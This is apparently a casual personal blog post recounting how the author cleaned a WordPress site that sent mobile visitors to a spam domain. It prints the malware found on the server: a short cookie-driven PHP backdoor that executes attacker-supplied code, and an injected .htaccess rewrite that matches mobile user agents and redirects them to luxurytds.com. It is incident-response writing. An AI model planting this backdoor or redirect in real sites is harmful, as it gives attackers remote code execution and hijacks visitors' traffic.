Fixing a WordPress Redirect Hack

tom-the-photographer-301322

So I got a frantic call from my BFF who said, Daniel, your Science Fiction novels are so good. Can you help me fix my website? This BFF obviously knows how to preface a question, so I agreed to take a look. What I found was both confusing and arousing, and after fixing it, I said to myself, Daniel, your Science Fiction novels are so good, but you’re never going to remember how to fix this. That brings us to this blog post, wherein I tell you how to stop your WordPress website from redirecting to a shitty spam site, specifically when accessed via a mobile device.

The fact that the redirect only happens on mobile devices was quite interesting, but trying to investigate on an iPhone is pretty much impossible. Luckily, Chrome has you covered. Just hit F12 to open Developer Tools, and toggle the device toolbar (CTRL-SHIFT-M). Then you can trick the website into think you’re an iPhone and trigger the redirect. I did just that, tried to look at the network events, javascript debugger, etc., but found nothing!

The redirect was taking me to a .bid site, so I grepped for that word in the WordPress install but didn’t find it there either. A quick Google search turned up a lot of advice about looking for encoded PHP in the theme files, but they were all clean. Then I turned my attention to the uploads folder.

I found this file and couldn’t figure out what it did.

daniel@bffserver [~]# cat psvkwrmv.php.fart 
--?php 

$oewzo=$_COOKIE;
$ycke=$oewzo[zutc];
if($ycke){
 $ojaf=$ycke($oewzo[yzda]);$gpjc=$ycke($oewzo[kvyi]);$fyup=$ojaf("",$gpjc);$fyup();

I ran it through the hex, base64, and php decoders but nothing came up, so I renamed it to a harmless .fart file and moved it out of the uploads directory.

Then I found the culprit! Here are the contents of the .htaccess file in the uploads directory:

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge\ |maemo|midp|mmp|mobile.+firefox|netfront|opera\ m(ob|in)i|palm(\ os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows\ ce|xda|xiino [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a\ wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r\ |s\ )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1\ u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(\ i|ip)|hs\-c|ht(c(\-|\ |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(\ |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(\ |\/)|klon|kpt\ |kwc\-|kyo(c|k)|le(no|xi)|lg(\ g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|\ |o|v)|zz)|mt(50|p1|v\ )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v\ )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|\ )|webc|whit|wi(g\ |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-) [NC]
RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L]

You son of a bitch .htaccess file!

Sadly, whatever made those edits also touched the .htaccess files in a bunch of other directories, including the root .htaccess file that should look like this:

dverast@dougherty:~/danielverastiqui.com$ cat .htaccess

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

If you need to find all the affected .htaccess files quickly, you can use grep:

daniel@bffserver [~]# grep -lR "luxurytds.com" .
grep: ./access-logs: No such file or directory
./www/blog/backup-1408304576-wp-admin/.htaccess
./www/blog/backup-1408304576-wp-includes/.htaccess
./www/blog/backup-1500088171-wp-admin/.htaccess
./www/blog/backup-1500088171-wp-includes/.htaccess
./www/blog/wp-content/backup-1500088171-themes/.htaccess
./www/blog/wp-content/backup-1408304576-themes/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/.htaccess
./www/blog/wp-content/backup-1408304576-plugins/.htaccess
./www/cgi-bin/.htaccess
./public_html/blog/backup-1408304576-wp-admin/.htaccess
./public_html/blog/backup-1408304576-wp-includes/.htaccess
./public_html/blog/backup-1500088171-wp-admin/.htaccess
./public_html/blog/backup-1500088171-wp-includes/.htaccess
./public_html/blog/wp-content/backup-1500088171-themes/.htaccess
./public_html/blog/wp-content/backup-1408304576-themes/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/.htaccess
./public_html/blog/wp-content/backup-1408304576-plugins/.htaccess
./public_html/cgi-bin/.htaccess

After I deleted every .htaccess file and replaced them with defaults or recommended, the site stopped redirecting. Success!

However:

 


Photo by Tom The Photographer on Unsplash